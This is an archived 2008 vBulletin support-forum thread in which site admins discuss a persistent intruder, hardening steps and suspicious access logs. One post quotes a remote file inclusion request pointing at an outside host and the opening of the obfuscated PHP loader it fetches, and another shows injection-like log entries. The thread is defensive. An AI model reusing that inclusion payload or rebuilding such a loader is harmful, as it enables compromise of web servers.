vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   weird user maybe a hacker (https://vborg.vbsupport.ru/showthread.php?t=183428)

Jase2 06-25-2008 08:23 PM

Just disable the plugin/hook system and re-upload all vBulletin non-image files. This will then make your forums use to the vBulletin core code.

Dismounted 06-26-2008 07:08 AM

If the login to the server was changed, it indicates an issue with the server, not vBulletin.

dtv100 06-26-2008 07:27 AM

Quote:

Originally Posted by Dismounted (Post 1559276)
If the login to the server was changed, it indicates an issue with the server, not vBulletin.

sorry i know my English is bad what I mean I did all those change to prevent or make sure he don't get a hold of server .

I remove this hacks today because they was in both of my site so i think one of them maybe was the way he find in .

inferno shout box
login as user
arcade
google search tag
who is on chat
hide hack

trying to be safe and not sorry . the hacker and me been at war for days today seen he give up or took a day off .


is there any way I can hide with a password the follow tools from admincp :
generate email list
email members
forum manager

dtv100 07-01-2008 10:07 PM

update
we change all server password ,vbulletin password ,we change location of admincp and remove links from forum to admincp (only site owner and i know link ),we hire a server tech to harden server ,we disable all hacks ,reupload vb original files and this guys still can log as post as anyone from staff .
I change my password everyday and still can post as me too .

any ideas where else to look ?

Dismounted 07-02-2008 06:45 AM

Are you sure they haven't uploaded any malicious files?

dtv100 07-02-2008 07:58 AM

Quote:

Originally Posted by Dismounted (Post 1564551)
Are you sure they haven't uploaded any malicious files?


OK i will delete everything on server except for sql ,avatars,profiles picture attachment and a few php file I wrote my self (extra pages) and will re upload all vb files .

to make sure that no file we did not upload is there .

ThatSnowGuy 07-16-2008 04:43 AM

I have a guest on my site that is viewing an error message. This is the guests location:

/forums/showthread. php?t = http://64.15.67.17/~calebsbi/logo.jpg

I added some spaces, not sure if posting the link is OK here or not, but it is not a link to a .jpg, it is some type of script. I reported abuse to the host of the account, so I am not sure how long the link will work for.

Here is how it starts out. I am removing the first character so it will show here. (I hope)

? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); function hc8a89c2c306fb($p341be97d9aff9) { $p341be97d9aff9 = str_replace(" ", "", $p341be97d9aff9);
return $p341be97d9aff9; } function ub5d21085bf2c0($p341be97d9aff9) { $p341be97d9aff9 = base64_decode(hc8a89c2c306fb($p341be97d9aff9));
return $p341be97d9aff9; } $oec12e0af93cb5 = array ( "po"

It's a pretty long script.

~Chuck

Marco van Herwaarden 07-16-2008 09:33 AM

I guess thos was a failed attempt to do a XSS attack on your forum.

ThatSnowGuy 07-16-2008 11:40 AM

Thanks for the reply Marco. I am guessing it may have been a bot as it stayed around for hours, even after I turned off the Forums for an hour.

~Chuck

dtv100 08-10-2008 07:34 PM

i find this on my logs after hacker try again maybe someone could tell me if he trying a injection and how to block it.

Code:

2008-08-05, 14:25:57, 1217946357, 64.7.132.147, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:43:24, 1217947404, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as%20string), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:43:59, 1217947439, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as%20string, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:47:52, 1217947672, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%1as%20string, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 15:01:31, 1217948491, 64.7.132.147, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 20:27:26, 1217968046, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as%20string), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)



All times are GMT. The time now is 12:11 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01289 seconds
  • Memory Usage 1,741KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (2)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (2)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete